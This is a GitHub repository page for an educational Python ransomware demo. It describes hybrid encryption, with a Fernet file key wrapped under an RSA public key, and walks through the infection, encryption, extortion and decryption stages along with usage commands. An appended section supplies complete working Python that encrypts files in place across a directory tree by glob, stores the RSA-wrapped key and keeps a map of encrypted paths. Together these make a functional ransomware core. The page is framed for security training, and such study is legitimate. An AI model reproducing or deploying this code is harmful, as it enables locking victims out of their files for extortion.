Repository: https://github.com/dubniczky/Ransomware (GitHub; language: Python; license: MIT; created 2022-08-03, last pushed 2022-08-03)
Description: A simple ransomware implementation in python for educational purposes
Topics: exploit, hack, python, ransomware
Indexed at: https://awesome.ecosyste.ms/projects/github.com%2Fdubniczky%2Fransomware (last synced 2025-03-31)

# Ransomware Demo

## Disclaimer

This Python ransomware is for educational purposes, for security engineers and analysts. Do not use it for any other purpose; I am not responsible for your actions.

## Support ❤️

If you find the project useful, please consider supporting or contributing.

[!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/dubniczky)

## Details

Ransomware is a type of malware that runs on a target's machine and encrypts the files it deems valuable with a symmetric key. After encryption, only the hackers have the means to recover the original files (short of the victim restoring from offline backups).

At this point, the hackers usually ask for money in the form of cryptocurrency, gift cards, or other hard-to-trace means in exchange for the decryption key.

A more complex ransomware system might have other components, such as a way to spread to other devices on the network, or to email itself to people in the victim's contact list.

## Implementation

This implementation uses a `hybrid key` method: the data is encrypted with a symmetric key, and that key is then saved on the drive encrypted with a public key embedded in the payload. Thanks to this, the payload never needs to transmit the key to a remote server (so there is no command-and-control traffic to block), and the private key never touches the victim's machine. Instead, the victim attaches the encrypted key to their payment, and the hacker (in some cases) sends back the decrypted key in response.

### Stages:

1. **Key generation**: the hacker generates an asymmetric key pair and attaches the public key to the payload script, keeping the private key.
2. **Infection**: the hacker finds a way to infect a target computer. There are countless methods for this, but they are not important in our case.
3. **Encryption**: the infected machine runs the payload and has (presumably) all of its important files encrypted and practically unusable.
4. **Extortion**: the hacker displays a message informing the victim that their machine has been hijacked and that the only way to recover the files is to pay the ransom and send the saved (encrypted) key.
5. **Decryption**: if the victim pays the ransom, the hacker decrypts the key with their asymmetric private key and transmits the plain key to the victim, who is then able to decrypt all the files.

## Technical details

1. The hacker generates a `2048`-bit RSA key pair, attaches the public key to the payload and keeps the private key.
2. In the encryption step a random symmetric key is generated, then all files that match the pre-determined glob patterns are encrypted with it. The key is then encrypted with the public key from the payload and written to the storage device alongside a map of the encrypted files.
3. The encrypted key can only be decrypted with the private key generated in step 1.
4. The data can then be decrypted using the recovered random key from step 2.

The file data is encrypted with Fernet, the symmetric authenticated-encryption recipe from the Python `cryptography` library (AES-128-CBC with an HMAC-SHA256 tag, so a tampered or wrongly keyed ciphertext is rejected instead of being decrypted to garbage). The Fernet key is encrypted with RSA.

## Usage

### Test run

Reset the demo project

```bash
make reset
```

Encrypt files, save key and map

```bash
make encrypt
```

Decrypt key with private key, then decrypt files

```bash
make decrypt
```

After the test run, the demo folder should look the same as it did before.

### Detailed usage

1. Reset demo folder

```bash
make reset
```

2. Generate key pair (the first path receives the private key, the second the public key)

```bash
mkdir -p keys
python3 generate.py 'keys/private.key' 'keys/public.key'
```

3. Replace the contents of the `PUBLIC_KEY` variable inside `encrypt.py` with the generated public key in `keys/public.key`

4. Update the `ENCRYPT_GLOBS` variable in `encrypt.py` to include any other globs, then run the encryption.

```bash
python3 encrypt.py
```

5. Decrypt the key saved in the local directory.

```bash
python3 unlock.py 'keys/private.key' $(cat secret.key)
```

6. Take the output of the previous command and use it to decrypt the files. Note that the plain key ends up in your shell history and in process listings this way, which is fine for a demo but not for anything else.

```bash
python3 decrypt.py map.log DECRYPTED_KEY
```

At this point you have successfully decrypted the files.

## Resources

Cryptography library documentation: [docs](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/rsa/)
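The complete hybrid-key round trip described under Technical details and Detailed usage, as an added example that is not the repository's own code (the project's `generate.py`, `encrypt.py`, `unlock.py` and `decrypt.py` are not reproduced here). It assumes the `cryptography` package is installed. The file names `secret.key` and `map.log` follow the README; the JSON format of the map, the default glob `**/*.txt`, RSA-OAEP with SHA-256 as the key-wrapping padding, and the sample files are assumptions. It only ever touches a temporary directory it creates itself.

```python
"""Hybrid-key round trip: Fernet for file contents, RSA-OAEP for the Fernet key.
Added example, not the project's own code; assumes the `cryptography` package.
File names, the glob list and the JSON map.log format are assumptions."""
import base64
import glob
import json
import os
import tempfile

from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa

# RSA-OAEP with SHA-256, the standard padding for wrapping a small key under RSA.
OAEP = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)


def generate_keypair():
    """Stage 1, hacker side: 2048-bit RSA pair as (private_pem, public_pem)."""
    priv = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    priv_pem = priv.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.PKCS8,
                                  serialization.NoEncryption())
    pub_pem = priv.public_key().public_bytes(
        serialization.Encoding.PEM, serialization.PublicFormat.SubjectPublicKeyInfo)
    return priv_pem, pub_pem


def _rewrite(path, transform):
    """Replace a file's contents with transform(contents)."""
    with open(path, "rb") as fh:
        data = fh.read()
    with open(path, "wb") as fh:
        fh.write(transform(data))


def encrypt_tree(root, public_pem, globs=("**/*.txt",)):
    """Stage 3, victim machine: encrypt matching files in place under a fresh Fernet
    key, wrap that key with the embedded public key into secret.key, and list the
    encrypted paths in map.log. Only the public key is present, so nothing written
    to disk or sent over the network can reveal the plaintext Fernet key."""
    fkey = Fernet.generate_key()  # random 32-byte key, urlsafe-base64 encoded
    f = Fernet(fkey)
    encrypted = []
    for pattern in globs:
        for path in glob.glob(os.path.join(glob.escape(root), pattern), recursive=True):
            if os.path.isfile(path):
                _rewrite(path, f.encrypt)
                encrypted.append(os.path.relpath(path, root))
    pub = serialization.load_pem_public_key(public_pem)
    with open(os.path.join(root, "secret.key"), "w") as fh:
        fh.write(base64.b64encode(pub.encrypt(fkey, OAEP)).decode())
    with open(os.path.join(root, "map.log"), "w") as fh:
        json.dump(sorted(encrypted), fh)
    return sorted(encrypted)


def unlock_key(private_pem, wrapped_b64):
    """Stage 5, hacker side: unwrap the Fernet key from the victim's secret.key."""
    priv = serialization.load_pem_private_key(private_pem, password=None)
    return priv.decrypt(base64.b64decode(wrapped_b64), OAEP)


def decrypt_tree(root, fkey):
    """Stage 5, victim machine: restore every path in map.log with the recovered key.
    Fernet raises InvalidToken if the key or the ciphertext is wrong."""
    f = Fernet(fkey)
    with open(os.path.join(root, "map.log")) as fh:
        paths = json.load(fh)
    for rel in paths:
        _rewrite(os.path.join(root, rel), f.decrypt)
    return paths


def demo():
    """Full round trip on constructed sample files in a temp dir; returns the results."""
    samples = {"docs/notes.txt": b"quarterly numbers",  # matched by **/*.txt
               "readme.txt": b"hello",                   # matched by **/*.txt
               "img.bin": b"\x89binary, not targeted"}   # no glob matches it
    with tempfile.TemporaryDirectory() as root:
        def read(rel):
            with open(os.path.join(root, rel), "rb") as fh:
                return fh.read()
        for rel, data in samples.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        priv_pem, pub_pem = generate_keypair()
        encrypted = encrypt_tree(root, pub_pem)
        after = {rel: read(rel) for rel in samples}
        try:  # a guessed key fails Fernet's HMAC check instead of yielding garbage
            Fernet(Fernet.generate_key()).decrypt(after["readme.txt"])
            wrong_key_rejected = False
        except InvalidToken:
            wrong_key_rejected = True
        with open(os.path.join(root, "secret.key")) as fh:
            fkey = unlock_key(priv_pem, fh.read())
        decrypt_tree(root, fkey)
        restored = {rel: read(rel) for rel in samples}
    return {"encrypted": encrypted,
            "untouched": [rel for rel in samples if after[rel] == samples[rel]],
            "restored_ok": restored == samples,
            "wrong_key_rejected": wrong_key_rejected}
```

Call `demo()` to run the whole flow; it returns which paths were encrypted, which were left alone because no glob matched, whether the files came back byte-identical after unwrapping the key with the private key, and whether a guessed Fernet key was refused. Two points worth noticing: the only artefacts left on the victim's disk are the RSA-wrapped `secret.key` and `map.log`, never the plaintext Fernet key, so a responder with a disk image and no private key cannot recover the files; and because Fernet authenticates its tokens, a wrong key fails closed rather than silently producing corrupted files.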